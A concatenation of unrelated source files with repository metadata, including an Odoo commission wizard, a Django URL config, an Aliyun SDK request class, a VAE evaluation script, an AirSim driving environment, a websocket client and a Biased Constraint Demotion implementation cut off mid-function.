'deduct_amount_fixed': deduct_amount
}
commission_fix.create(fix_vals)
fixed_commission = sum(commission_id.mapped('fixed_commission_line_ids').mapped('fixed_commission'))
for line in structure_id.exclude_line_ids:
order_line = special_lines.filtered(lambda x : x.product_id == line.product_id)
total_price = sum(order_line.mapped('price_subtotal'))
total_qty = sum(order_line.mapped('quantity'))
if line.compute_type == 'percentage':
cal = str(line.commission_per_drum) + '%'
commission = (total_price * line.commission_per_drum) / 100
else:
cal = str(line.commission_per_drum) + '/-'
commission = total_qty * line.commission_per_drum
special_vals = {
'sales_commission_id':commission_id.id,
'product_id':line.product_id.id,
'qty_sold':total_qty,
'amount':total_price,
'cal':cal,
'commission':commission
}
special_comm_line.create(special_vals)
special_commission = sum(commission_id.mapped('special_commission_line_ids').mapped('commission'))
net_commission = commission_id.general_commission + fixed_commission + special_commission
commission_id.write({
'special_commission':special_commission,
'fixed_commission': fixed_commission,
'net_commission':net_commission
})
[order.write({'is_commission_created':True}) for order in sale_orders]
return {'effect': {'fadeout': 'slow',
'message': "Yeah %s, It's Done." % self.env.user.name,
'img_url': '/web/static/src/img/smile.svg', 'type': 'rainbow_man'}}
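# Illustrative usage sketch: how this wizard might be driven from an Odoo shell.
# The field values below are placeholder assumptions.
# wizard = env['sales.commission.wizard'].create({
#     'date_from': '2021-10-01',
#     'date_to': '2021-10-31',
#     'ignore_late_payments': True,
#     'late_payments_exceed': 30,
# })
# wizard.action_generate_commissions()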
|
[
"mohamed.abuemira@gmial.com"
] |
mohamed.abuemira@gmial.com
|
170ccd24c50321c37c6335c0652314406ed7802a
|
22a7161361089b84a09457b46d79ce2bd87f5b2c
|
/tests/urls.py
|
bb83d09b1ab5c7ac9d1103f51acf97588d336b6b
|
[] |
no_license
|
matthew-a-dunlap/django-inspectional-registration
|
56fb9b9945d41de069034fd066e3b92b388b8498
|
d6dd945718e5f7ac09966763c83104c4966cb775
|
refs/heads/master
| 2020-09-09T17:33:18.128626
| 2016-05-23T19:57:19
| 2016-05-23T19:57:19
| 221,512,520
| 0
| 0
| null | 2019-11-13T17:13:08
| 2019-11-13T17:13:07
| null |
UTF-8
|
Python
| false
| false
| 399
|
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
try:
from django.conf.urls import url, patterns, include
except ImportError:
from django.conf.urls.defaults import url, patterns, include
from django.contrib import admin
admin.autodiscover()
urlpatterns = patterns('',
url(r'^admin/', include(admin.site.urls)),
url(r'^registration/', include('registration.urls')),
)
|
[
"lambdalisue@hashnote.net"
] |
lambdalisue@hashnote.net
|
1e44f68b4293ce9210579097294860acfc7ebac2
|
f8f2536fa873afa43dafe0217faa9134e57c8a1e
|
/aliyun-python-sdk-ons/aliyunsdkons/request/v20190214/UntagResourcesRequest.py
|
3e59f17cdafd0c517f61e6e5a9daaacecfc58d26
|
[
"Apache-2.0"
] |
permissive
|
Sunnywillow/aliyun-openapi-python-sdk
|
40b1b17ca39467e9f8405cb2ca08a85b9befd533
|
6855864a1d46f818d73f5870da0efec2b820baf5
|
refs/heads/master
| 2022-12-04T02:22:27.550198
| 2020-08-20T04:11:34
| 2020-08-20T04:11:34
| 288,944,896
| 1
| 0
|
NOASSERTION
| 2020-08-20T08:04:01
| 2020-08-20T08:04:01
| null |
UTF-8
|
Python
| false
| false
| 2,302
|
py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkons.endpoint import endpoint_data
class UntagResourcesRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'Ons', '2019-02-14', 'UntagResources','ons')
self.set_method('POST')
if hasattr(self, "endpoint_map"):
setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
if hasattr(self, "endpoint_regional"):
setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())
def get_All(self):
return self.get_query_params().get('All')
def set_All(self,All):
self.add_query_param('All',All)
def get_ResourceIds(self):
return self.get_query_params().get('ResourceIds')
def set_ResourceIds(self, ResourceIds):
for depth1 in range(len(ResourceIds)):
if ResourceIds[depth1] is not None:
self.add_query_param('ResourceId.' + str(depth1 + 1) , ResourceIds[depth1])
def get_ResourceType(self):
return self.get_query_params().get('ResourceType')
def set_ResourceType(self,ResourceType):
self.add_query_param('ResourceType',ResourceType)
def get_InstanceId(self):
return self.get_query_params().get('InstanceId')
def set_InstanceId(self,InstanceId):
self.add_query_param('InstanceId',InstanceId)
def get_TagKeys(self):
return self.get_query_params().get('TagKeys')
def set_TagKeys(self, TagKeys):
for depth1 in range(len(TagKeys)):
if TagKeys[depth1] is not None:
self.add_query_param('TagKey.' + str(depth1 + 1) , TagKeys[depth1])
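# Illustrative usage sketch: sending this request with aliyunsdkcore's AcsClient.
# The credentials, region and resource values below are placeholder assumptions.
# from aliyunsdkcore.client import AcsClient
# client = AcsClient('<access-key-id>', '<access-key-secret>', 'cn-hangzhou')
# request = UntagResourcesRequest()
# request.set_InstanceId('MQ_INST_xxxx')
# request.set_ResourceType('TOPIC')
# request.set_ResourceIds(['my-topic'])
# request.set_TagKeys(['env'])
# response = client.do_action_with_exception(request)
# print(response)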
|
[
"sdk-team@alibabacloud.com"
] |
sdk-team@alibabacloud.com
|
7687d9795fd4f458ba5d860228bb5c67c20fb1f1
|
5851ed4f3398b3e96cb0f5c09b10289cadd89d6a
|
/digits/model/tasks/__init__.py
|
f8aaa77608973c67dd4c4885bef7604e12eba769
|
[
"LicenseRef-scancode-generic-cla"
] |
no_license
|
wills2133/digits-distributed
|
953060830dde0c96957accfb621f4f00cc74837a
|
addf2fda32291a02a7c602b9d58d37ca71afe79d
|
refs/heads/master
| 2021-09-13T00:05:42.812330
| 2018-01-31T14:16:25
| 2018-01-31T14:16:25
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 686
|
py
|
# Copyright (c) 2014-2017, NVIDIA CORPORATION. All rights reserved.
from __future__ import absolute_import
from .caffe_train import CaffeTrainTask
##########################################
from .distrib_caffe_train import DistributedTrainTask
##########################################
from .torch_train import TorchTrainTask
from .train import TrainTask
import ssd_pascal
__all__ = [
'CaffeTrainTask',
'DistributedTrainTask', ##########
'TorchTrainTask',
'TrainTask',
]
from digits.config import config_value # noqa
if config_value('tensorflow')['enabled']:
from .tensorflow_train import TensorflowTrainTask # noqa
__all__.append('TensorflowTrainTask')
|
[
"wills2133@hotmail.com"
] |
wills2133@hotmail.com
|
20b656ddbab9eae32f2eb0fa454be28a9a548ccc
|
333a9bf3ce71f2aefc0b105fe4058c2aacc5ddb1
|
/vae_eval.py
|
ed02672e2ae5d2e68493bce36009bf47b97c521f
|
[
"MIT"
] |
permissive
|
shijack/vae-system
|
33a5cb53a52cfbc23952cdcc8bb3daf80ef75926
|
14506b3b5966162a3502b26dd68d1a77ccbcfb34
|
refs/heads/master
| 2020-04-02T01:44:26.306971
| 2018-10-24T12:49:51
| 2018-10-24T12:49:51
| 153,872,748
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,449
|
py
|
import tensorflow as tf
import numpy as np
import scipy.interpolate
import cv2
import os
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"] = "1"
LATENT_DIM = 256
ROWS, COLS = 10, 10
HEIGHT, WIDTH, DEPTH = 144, 112, 3
N, M = 10, 30
splines = []
x = range(N)
xs = np.linspace(0, N, N * M)
for i in range(ROWS * COLS * LATENT_DIM):
y = np.random.normal(0.0, 1.0, size=[N]).astype(np.float32)
s = scipy.interpolate.UnivariateSpline(x, y, s=2)
ys = s(xs)
splines.append(ys)
splines = np.array(splines)
def read_record_new(images_path='./data', depth=1):
train_total_data = []
for img_path in os.listdir(images_path):
img = cv2.imread(os.path.join(images_path, img_path))
if depth == 1:
img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
img = cv2.resize(img, (112, 144)) / 255.0
train_total_data.append(img)
train_total_data = np.array(train_total_data)
if depth == 1:
train_total_data = np.expand_dims(train_total_data, axis=3)
return train_total_data
with tf.Session() as sess:
saver = tf.train.import_meta_graph('./model_new/gan-20000.meta')
saver.restore(sess, tf.train.latest_checkpoint('./model_new'))
graph = tf.get_default_graph()
# latent_input = graph.get_tensor_by_name('latent_input:0')
x_input = graph.get_tensor_by_name('encoder/input_img:0')
# laten_mean = graph.get_tensor_by_name('encoder/mean:0')
# laten_stddev = graph.get_tensor_by_name('encoder/stddev:0')
image_eval = graph.get_tensor_by_name('decoder/reconstruct/conv5/act:0')
latent_feature = graph.get_tensor_by_name('variance/latent_feature:0')
imgs = read_record_new(depth=3)
# for i in range(N * M):
    for i in range(N * M // 2):
time_point = splines[..., i]
time_point = np.reshape(time_point, [ROWS * COLS, LATENT_DIM])
# data = sess.run(image_eval, feed_dict={latent_input: time_point})
data = imgs[:10, ...]
# data_mean,data_stdddev = sess.run([laten_mean,laten_stddev], feed_dict={x_input: data})
# data = data_mean+ data_stdddev
data = sess.run(latent_feature, feed_dict={x_input: data})
np.savetxt('./eval/feature_1_%d' % i, data)
# data = np.reshape((data * 255).astype(int), (ROWS, COLS, HEIGHT, WIDTH, DEPTH))
# data = np.concatenate(np.concatenate(data, 1), 1)
# cv2.imwrite('./eval/eval_img_' + str(i) + '.png', data)
# cv2.imshow('eval_img', data)
# cv2.moveWindow('eval_img', 0, 0)
# key = cv2.waitKey(0)
# if key == 27:
# break
def test_image(path_image, num_class):
img_string = tf.read_file(path_image)
img_decoded = tf.image.decode_png(img_string, channels=3)
img_resized = tf.image.resize_images(img_decoded, [224, 224])
img_resized = tf.reshape(img_resized, shape=[1, 224, 224, 3])
# model = Vgg19(bgr_image=img_resized, num_class=num_class, vgg19_npy_path='./vgg19.npy')
# score = model.fc8
# prediction = tf.argmax(score, 1)
saver = tf.train.Saver()
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
saver.restore(sess, "./tmp/checkpoints/model_epoch50.ckpt")
cv2.imwrite('img.png', img_decoded.eval())
# plt.imshow(img_decoded.eval())
# plt.title("Class:" + class_name[sess.run(prediction)[0]])
# plt.show()
# test_image('./validate/11.jpg', 2)
|
[
"690141808@qq.com"
] |
690141808@qq.com
|
31ca9b836c834e4a4bf5e8b867b7bc82bcc0f319
|
e2d069bc194216a5235a20d6075932ab6e146866
|
/03_递归.py
|
5648ae31ce082eb55b447efece54a74f77fd06b6
|
[] |
no_license
|
ruoduan-hub/algorithm_py
|
e1642c62614024dbb3c4b724863a523524c9b359
|
600b20fad179a88ac2c1694154115de3b0a6359f
|
refs/heads/master
| 2023-07-23T15:05:46.490345
| 2021-09-06T11:50:19
| 2021-09-06T11:50:19
| 211,216,812
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 362
|
py
|
# coding=UTF-8
"""
When writing recursion that works on an array, the base case is usually an empty array or an array containing only one element. If you get stuck, check whether your base case looks like that.
"""
def count_down(i):
print(i)
    if i <= 1:  # base case
return
    else:  # recursive case
count_down(i - 1)
count_down(100)
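# Illustrative sketch of the array/list case described in the docstring above:
# base case = empty list, recursive case = shrink the list by one element.
def recursive_sum(items):
    if not items:  # base case: an empty list
        return 0
    return items[0] + recursive_sum(items[1:])  # recursive case
print(recursive_sum([1, 2, 3, 4]))  # prints 10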
|
[
"chad97@126.com"
] |
chad97@126.com
|
ca7862cad14001a86cfc5966a988df66ea996a7f
|
ce4913de9832a5e67b234ba911f4a5cd0bfa82f3
|
/envs/airsim/airsimcarenv.py
|
425b669390cb3cf42e49ea775fffd91ee4ea5159
|
[] |
no_license
|
Arlen0615/DRL-AutonomousVehicles
|
6c31fe7f154af6ac43298f814edd13cbf0d35cf8
|
96d698896edccfab693558181924b8b411aae7a4
|
refs/heads/master
| 2021-08-11T22:28:39.778934
| 2017-11-14T06:04:32
| 2017-11-14T06:04:32
| 110,491,854
| 0
| 0
| null | 2017-11-13T02:46:11
| 2017-11-13T02:46:11
| null |
UTF-8
|
Python
| false
| false
| 4,560
|
py
|
import logging
import math
import numpy as np
import random
import sys
import gym
from gym import spaces
from gym.utils import seeding
from gym.spaces import Tuple, Box, Discrete, MultiDiscrete, Dict
from gym.spaces.box import Box
from envs.airsim.myAirSimCarClient import *
logger = logging.getLogger(__name__)
class AirSimCarEnv(gym.Env):
airsimClient = None
def __init__(self):
# left depth, center depth, right depth, steering
self.low = np.array([0.0, 0.0, 0.0, 0])
self.high = np.array([100.0, 100.0, 100.0, 21])
self.observation_space = spaces.Box(self.low, self.high)
self.action_space = spaces.Discrete(21)
self.state = (100, 100, 100, random.uniform(-1.0, 1.0))
self.episodeN = 0
self.stepN = 0
self.allLogs = { 'speed':[0] }
self._seed()
self.stallCount = 0
global airsimClient
airsimClient = myAirSimCarClient()
def _seed(self, seed=None):
self.np_random, seed = seeding.np_random(seed)
return [seed]
def computeReward(self, mode='roam'):
speed = self.car_state.speed
steer = self.steer
dSpeed = 0
if mode == 'roam' or mode == 'smooth':
# reward for speed
reward = speed/60
# penalize sharp steering, to discourage going in a circle
if abs(steer) >= 1.0 and speed > 100:
reward -= abs(steer) * 2
# penalize collision
if len(self.allLogs['speed']) > 0:
dSpeed = speed - self.allLogs['speed'][-2]
else:
dSpeed = 0
reward += dSpeed
# penalize for going in a loop forever
#reward -= abs(self.steerAverage) * 10
else:
reward = 1
# Placehoder. To be filled
if mode == 'smooth':
# also penalize on jerky motion, based on a fake G-sensor
steerLog = self.allLogs['steer']
g = abs(steerLog[-1] - steerLog[-2]) * 5
reward -= g
return [reward, dSpeed]
def _step(self, action):
assert self.action_space.contains(action), "%r (%s) invalid"%(action, type(action))
self.stepN += 1
steer = (action - 10)/5.0
gas = 0.45555
airsimClient.setCarControls(gas, steer)
car_state = airsimClient.getCarState()
self.car_state = car_state
self.steer = steer
speed = car_state.speed
if speed < 5:
self.stallCount += 1
else:
self.stallCount = 0
if self.stallCount > 13:
done = True
else:
done = False
self.sensors = airsimClient.getSensorStates()
cdepth = self.sensors[1]
self.state = self.sensors
self.state.append(action)
self.addToLog('speed', speed)
self.addToLog('steer', steer)
steerLookback = 17
steerAverage = np.average(self.allLogs['steer'][-steerLookback:])
self.steerAverage = steerAverage
# Training using the Roaming mode
reward, dSpeed = self.computeReward('roam')
self.addToLog('reward', reward)
rewardSum = np.sum(self.allLogs['reward'])
# Terminate the episode on large cumulative amount penalties,
# since car probably got into an unexpected loop of some sort
if rewardSum < -1000:
done = True
sys.stdout.write("\r\x1b[K{}/{}==>reward/depth/steer/speed: {:.0f}/{:.0f} \t({:.1f}/{:.1f}/{:.1f}) \t{:.1f}/{:.1f} \t{:.2f}/{:.2f} ".format(self.episodeN, self.stepN, reward, rewardSum, self.state[0], self.state[1], self.state[2], steer, steerAverage, speed, dSpeed))
sys.stdout.flush()
# placeholder for additional logic
if done:
pass
return np.array(self.state), reward, done, {}
def addToLog (self, key, value):
if key not in self.allLogs:
self.allLogs[key] = []
self.allLogs[key].append(value)
def _reset(self):
airsimClient.reset()
self.stepN = 0
self.stallCount = 0
self.episodeN += 1
print("")
self.allLogs = { 'speed': [0] }
# Randomize the initial steering to broaden learning
self.state = (100, 100, 100, random.uniform(0.0, 21.0))
return np.array(self.state)
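# Illustrative usage sketch (requires a running AirSim simulator; the step count is a placeholder).
# env = AirSimCarEnv()
# state = env._reset()
# for _ in range(100):
#     state, reward, done, _ = env._step(env.action_space.sample())
#     if done:
#         break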
|
[
"kaihu@smesh.net"
] |
kaihu@smesh.net
|
b39d75d312bbf42e01d04bc586a80ba6c93b0ed2
|
e0330ee0cdc9521692595df137180fa0d00864e8
|
/ENV/bin/wsdump.py
|
516407141b978a7bdf49300d9872a925f8b2aba5
|
[] |
no_license
|
lesps/Jeeves.Witherspoon
|
ce8fb4fc13b0824ffbf19a2a95c4df5b21f1b4c6
|
4012bb5f2bef1a61d7af849668740f6f156511fd
|
refs/heads/master
| 2020-05-27T10:34:12.492532
| 2013-07-27T20:20:15
| 2013-07-27T20:20:15
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,132
|
py
|
#!/home/spencer/python/Jeeves/ENV/bin/python
import argparse
import code
import sys
import threading
import websocket
try:
import readline
except:
pass
OPCODE_DATA = (websocket.ABNF.OPCODE_TEXT, websocket.ABNF.OPCODE_BINARY)
ENCODING = getattr(sys.stdin, "encoding", "").lower()
class VAction(argparse.Action):
def __call__(self, parser, args, values, option_string=None):
if values==None:
values = "1"
try:
values = int(values)
except ValueError:
values = values.count("v")+1
setattr(args, self.dest, values)
def parse_args():
parser = argparse.ArgumentParser(description="WebSocket Simple Dump Tool")
parser.add_argument("url", metavar="ws_url",
help="websocket url. ex. ws://echo.websocket.org/")
parser.add_argument("-v", "--verbose", default=0, nargs='?', action=VAction,
dest="verbose",
help="set verbose mode. If set to 1, show opcode. "
"If set to 2, enable to trace websocket module")
return parser.parse_args()
class InteractiveConsole(code.InteractiveConsole):
def write(self, data):
sys.stdout.write("\033[2K\033[E")
# sys.stdout.write("\n")
sys.stdout.write("\033[34m" + data + "\033[39m")
sys.stdout.write("\n> ")
sys.stdout.flush()
def raw_input(self, prompt):
line = raw_input(prompt)
if ENCODING and ENCODING != "utf-8" and not isinstance(line, unicode):
line = line.decode(ENCODING).encode("utf-8")
elif isinstance(line, unicode):
            line = line.encode("utf-8")
return line
def main():
args = parse_args()
console = InteractiveConsole()
if args.verbose > 1:
websocket.enableTrace(True)
ws = websocket.create_connection(args.url)
print("Press Ctrl+C to quit")
def recv():
frame = ws.recv_frame()
if not frame:
raise websocket.WebSocketException("Not a valid frame %s" % frame)
elif frame.opcode in OPCODE_DATA:
return (frame.opcode, frame.data)
elif frame.opcode == websocket.ABNF.OPCODE_CLOSE:
ws.send_close()
return (frame.opcode, None)
elif frame.opcode == websocket.ABNF.OPCODE_PING:
ws.pong("Hi!")
return None, None
def recv_ws():
while True:
opcode, data = recv()
msg = None
if not args.verbose and opcode in OPCODE_DATA:
msg = "< %s" % data
elif args.verbose:
msg = "< %s: %s" % (websocket.ABNF.OPCODE_MAP.get(opcode), data)
if msg:
console.write(msg)
thread = threading.Thread(target=recv_ws)
thread.daemon = True
thread.start()
while True:
try:
message = console.raw_input("> ")
ws.send(message)
except KeyboardInterrupt:
return
except EOFError:
return
if __name__ == "__main__":
try:
main()
except Exception as e:
print(e)
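# Illustrative invocation (the URL is the example given in the argparse help above):
#   python wsdump.py ws://echo.websocket.org/ -v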
|
[
"lesp@seas.upenn.edu"
] |
lesp@seas.upenn.edu
|
7c3d454eab4479bf2d1ee619b4491847e62b46a7
|
990be294e69d48676a0f8176c37110328956e71a
|
/setup.py
|
0f4229bd5622ea158ea444f05713573247bda4b3
|
[] |
no_license
|
akshaypermunda/datascience
|
09898d9dd660e7ca441e22beed9d409174a46031
|
e06703b336d706131a708640c15567065d469f88
|
refs/heads/master
| 2022-12-15T08:28:03.846168
| 2020-09-13T16:25:45
| 2020-09-13T16:25:45
| 295,188,700
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 324
|
py
|
from setuptools import find_packages, setup
setup(
name='src',
packages=find_packages(),
version='0.1.0',
    description='A dashboard which provides an interactive visualization of COVID-19 Data which can be customized according to local interests.',
author='Akshay Permunda',
license='',
)
|
[
"noreply@github.com"
] |
noreply@github.com
|
dc65124f1049308aad58600a95ccf125c9d4d3b1
|
b84305736a16279a7e3eb94b597e0a59df15676c
|
/src/BCD.py
|
a4141aaa844b1ea137f62cad07b148485872790d
|
[] |
no_license
|
ellenmdai/BiasedConstraintDemotion
|
cefcacf9f468f3fef316b352990f8cdee3bc2c33
|
ebd39f2d4a6fdf4009f56265e60cf8dae4cd078f
|
refs/heads/master
| 2022-04-26T08:37:52.234488
| 2020-05-01T21:15:57
| 2020-05-01T21:15:57
| 260,560,460
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 15,028
|
py
|
import numpy as np
from pandas import DataFrame, read_csv
from collections import Counter
from itertools import combinations
class BCD(object):
"""A class that performs Biased Constraint Demotion on given data.
Attributes:
vt (DataFrame): violation tableau of data (optional);
ct (DataFrame): constraint tableau of data;
markednessConstraints (set): constraint names of all constraints denoted by a 'm:' prefix (or at least not 'f:');
strata (list of sets): list of each stratum of constraints in order, with more dominant strata coming first;
"""
def __init__(self, vtPath = None, ctPath = None):
"""
Parameters:
----------
vtPath : str, optional
Path to a .csv containing a violation tableau. If both this and ctPath are given, ctPath will be ignored.
Default is None.
ctPath : str, optional
Path to a .csv containing a constraint tableau. Default is None. If ctPath is None here, then it must be
initialized with either loadCt() or generateCtFromVt().
"""
self.vt = None
self.ct = None
self.markednessConstraints = None
self.strata = []
if (vtPath):
self.vt = read_csv(vtPath)
elif (ctPath):
self.ct = read_csv(ctPath)
self.markednessConstraints = set([con for con in self.ct.columns.values[3:] if not con.startswith('f:')])
def loadVt(self, vtPath):
self.vt = read_csv(vtPath)
def loadCt(self, ctPath):
self.ct = read_csv(ctPath)
# from constraint names, consider it a markedness constraint if not marked as faithfulness (i.e. does not start with "f:")
self.markednessConstraints = set([con for con in self.ct.columns.values[3:] if not con.startswith('f:')])
def generateCtFromVt(self):
""" Uses self.vt to generate a constraint tableau stored in self.ct, and the set of markedness constraints stored
in self.markednessConstraints.
Raises
------
Exception: If for an input, any number other than exactly one row marked as the optimal output.
"""
vt = self.vt.sort_values(by=['Input', 'Optimal']) # for every input, the optimal output will appear first.
self.ct = DataFrame(columns=['Input', 'Winner', 'Loser'] + list(vt.columns.values[3:]))
optimalRow = None
for i, row in vt.iterrows():
if (optimalRow is not None and row['Input'] == optimalRow['Input']): # the optimal for this group
if (not np.isnan(row['Optimal'])):
                    raise Exception("cannot have multiple optimal outputs for single input:", row['Input'])
mdpData = optimalRow.values[3:] - row.values[3:]
mdpData = ['L' if v > 0 else 'W' if v < 0 else '' for v in mdpData]
self.ct.loc[i] = [row['Input'], optimalRow['Output'], row['Output']] + mdpData
            elif (np.isnan(row['Optimal'])):
raise Exception("must have some optimal output info for:", row['Input'])
else:
optimalRow = row
self.markednessConstraints = set([con for con in self.ct.columns.values[3:] if not con.startswith('f:')])
def saveCt(self, path):
self.ct.to_csv(path, index=False)
def saveOrganizedTableau(self, path):
self.organizeTableau(self.ct, self.strata).to_csv(path, index=False)
def doBCD(self):
""" Runs the overall BCD algorithm, filling self.strata. """
ct = self.ct.copy()
self.strata = []
faithSets = [] # stack for when determining which set of faithfulness constraints should be ranked
        # while there are still constraints not yet placed
while (faithSets or len(ct.columns) > 3):
# if we have multiple f-sets to choose from based on the last iteration, continue BCD for each option and
# retain the strata of the optimal one.
if (faithSets):
bestFaithSet = self.findMinFaithSubset(faithSets)
self.strata += bestFaithSet[0]
ct = bestFaithSet[1]
continue
iterationResult = self.findNextStratum(ct)
if (type(iterationResult) == set ): # we got back a single set of constraints to be the next stratum
self.strata.append(iterationResult)
                # remove resolved data from consideration in future iterations
self.removeResolvedRowsAndCols(ct, iterationResult)
else: # we got back a list of possible sets. Store the sets to find which frees up the most m-constraints in the next iteration.
for faithSet in iterationResult:
workingCt = ct.copy()
self.removeResolvedRowsAndCols(workingCt, faithSet)
faithSets.append(([faithSet], workingCt, 0)) # (potential strata, working ct, # freed markedness constraints)
def findNextStratum(self, workingCt):
""" Determines the best set(s) of constraints for the next stratum.
Parameters:
----------
workingCt (DataFrame): a constraint tableau containing only unranked constraints and unresolved mark-data pairs.
Returns:
----------
        rankNext (list of sets): the potential sets of constraints for the next stratum, either of m-constraints, f-constraints,
or multiple sets of f-constraints if multiple would free up m-constraints later.
"""
fuseAll = workingCt.iloc[:, 3:].apply(lambda col: self.fusion(col)) # don't fuse winner, loser, input info
noL = fuseAll[fuseAll != 'L'] # all constraints that prefer no losers
noLMarkedness = self.markednessConstraints.intersection(set([constraintName[0] for constraintName in noL.iteritems()]))
        if (noLMarkedness): # if at least one of NoL is a markedness constraint
rankNext = noLMarkedness
# otherwise, no markedness constraint can be placed right now, so...
# if there are still some constraints that prefer losers and if at least one of NoL prefers a winner
elif (len(noL) < len(fuseAll) and (len(noL[noL == 'W']) > 0)) :
freeingFaithSets = self.findPotentialMinFaithSubsets(noL, workingCt)
if (len(freeingFaithSets) == 1):
rankNext = freeingFaithSets[0]
else:
return freeingFaithSets
else:
rankNext = set(noL.index)
return rankNext
def findPotentialMinFaithSubsets(self, noL, ct):
""" Finds the smallest sized subsets of f-constraints that frees up an m-constraint for the next iteration.
Parameters:
----------
noL (Series): Series where the indices are constraints that prefer no losers for the given ct and the values are either
'W' or 'e'.
ct: A constraint tableau containing only unranked constraints and unresolved mark-data pairs.
Returns:
----------
        freeingFaithSets (list): All subsets of a certain size that free at least one m-constraint for the next iteration.
This may contain just one or multiple sets.
"""
activeFaith = noL[noL == 'W']
fSetSize = 0
freeingFaithSets = []
# starting with size 1, test all combinations of constraints of that size until at least one combination frees an m-constraint
while (fSetSize < len(activeFaith) and len(freeingFaithSets) == 0):
fSetSize += 1
faithSets = combinations(activeFaith.index, fSetSize)
# for each possible set, see if placing them as a stratum would free an m-constraint
for f in faithSets:
ctFreedomTest = ct.copy()
self.removeResolvedRowsAndCols(ctFreedomTest, f)
testFuseAll = ctFreedomTest.iloc[:, 3:].apply(lambda col: self.fusion(col))
freedMConstraints = self.markednessConstraints.intersection(set( \
[constraintName[0] for constraintName in testFuseAll[testFuseAll != 'L'].iteritems()]))
# if f frees up a markedness constraint, add to freeingfaithsets
if (len(freedMConstraints) > 0):
freeingFaithSets.append(set(f))
if (len(freeingFaithSets) == 0):
# if no such subset exists, return all f-constraints that preferred a winner
return [set(activeFaith.index)]
return freeingFaithSets
def findMinFaithSubset(self, faithSets):
""" From multiple potential f-constraint subsets, picks out the one that frees the most m-constraints before having
to place another f-constraint, which is assumed to be the optimal choice. If multiple sets free the same number
of m-constraints, this returns the first one encountered.
Parameters:
----------
faithSets (list): A list (treated as a Stack) of tuples in the form (workingStrata, workingCt, numFreedMConstraints) where:
        workingStrata (list): stratified hierarchy of constraints, starting with the initial f-set in question, and any other
m-constraint sets placed after.
workingCt (DataFrame): a constraint tableau containing only columns not yet ranked either in self.strata or workingStrata and the
mark-data pairs not yet resolved by them.
numFreedMConstraints: The number of markedness constraints able to be ranked by placing workingStrata's initial f-constraint
set.
Returns:
----------
bestFaithSet (tuple): A tuple in the form (workingStrata, workingCt, numFreedMConstraints) of the f-set that frees the most m-constraints.
"""
bestFaithSet = ([], None, -1) # any real faithSet will beat this placeholder
while (faithSets): # while we're still choosing between faithSets
(workingStrata, workingCt, numFreedMConstraints) = faithSets.pop()
iterationResult = self.findNextStratum(workingCt)
# if we get back a single stratum of only markedness constraints, add to numFreedMConstraints and continue iterating
if (type(iterationResult) == set and self.markednessConstraints.intersection(iterationResult) == iterationResult):
self.removeResolvedRowsAndCols(workingCt, iterationResult)
workingStrata.append(iterationResult)
faithSets.append((workingStrata, workingCt, numFreedMConstraints + len(iterationResult)))
# if we'd have to place a faithfulness constraint, we've reached the end of our testing for the original faithSet
# candidate, so update the best faithSet if this one's better
elif (numFreedMConstraints > bestFaithSet[2]):
bestFaithSet = (workingStrata, workingCt, numFreedMConstraints)
return bestFaithSet
def printStrata(self):
print("STRATA:")
for ranking, stratum in enumerate(self.strata, start=1):
print('Rank', ranking, stratum)
def calculateRMeasure(self):
""" Calculates the R-Measure of this particular ranking, which is the sum of the number of m-constraints that dominates
each f-constraint.
Returns:
----------
r (int): R-Measure of self.strata
"""
self.r = 0
dominatingMCount = 0
for stratum in self.strata:
mCount = 0
for constraint in stratum:
if constraint in self.markednessConstraints:
mCount += 1
else:
self.r += dominatingMCount
dominatingMCount += mCount
return self.r
@staticmethod
def fusion(constraint): # constraint = a column and its values
""" logical operation combining ERCs of multiple data points, as described in RCD the Movie by Alan Prince (2009).
Parameters:
----------
constraint (series): a column from a constraint tableau where the header is the constraint name and each value comes from
a row, where 'W' means the winner is preferred by this constraint and 'L' means the loser is preferred.
Returns:
----------
'L' if a loser is preferred by any row;
        'e' if neither is preferred by any row;
'W' if at least one winner and no losers are preferred.
"""
count = Counter(constraint)
if 'L' in count:
return 'L'
if 'W' not in count:
return 'e'
return 'W'
@staticmethod
    def removeResolvedRowsAndCols(ct, resolvedConstraints):
        """ Gets rid of data resolved by a certain stratum in a constraint tableau, so that it won't be considered in future steps.
Parameters:
----------
ct (DataFrame): the working constraint tableau.
resolvedConstraints (set): Names of constraints whose columns and resolved rows are to be eliminated.
"""
for constraint in resolvedConstraints:
winnerPreferredIndices = ct[ct[constraint] == 'W'].index
ct.drop(winnerPreferredIndices, inplace=True)
ct.drop(constraint, axis=1, inplace=True)
@staticmethod
def organizeTableau(originalCt, strata):
""" Reorders a constraint tableau to make following the BCD algorithm manually easier. Constraints are sorted left to right
from most to least dominant, and mark-data pairs are sorted top to bottom by the stratum number that resolves it (i.e.
        rows resolved by more dominant strata are placed towards the top). An additional 'Rank' column is also added indicating
which stratum resolves that row.
Parameters:
----------
originalCt (DataFrame): the constraint tableau that contains all data. This will remain untouched; a copy will be edited.
strata (list): The stratified hierarchy, where each stratum is a set, whose order will be used to sort the constraint
tableau.
Returns:
----------
ct (DataFrame): A sorted version of originalCt with an additional 'Rank' column.
"""
ct = originalCt.copy()
ct['Rank'] = 0
columnOrder = list(ct.columns)[:3]
for ranking, stratum in enumerate(strata, start=1):
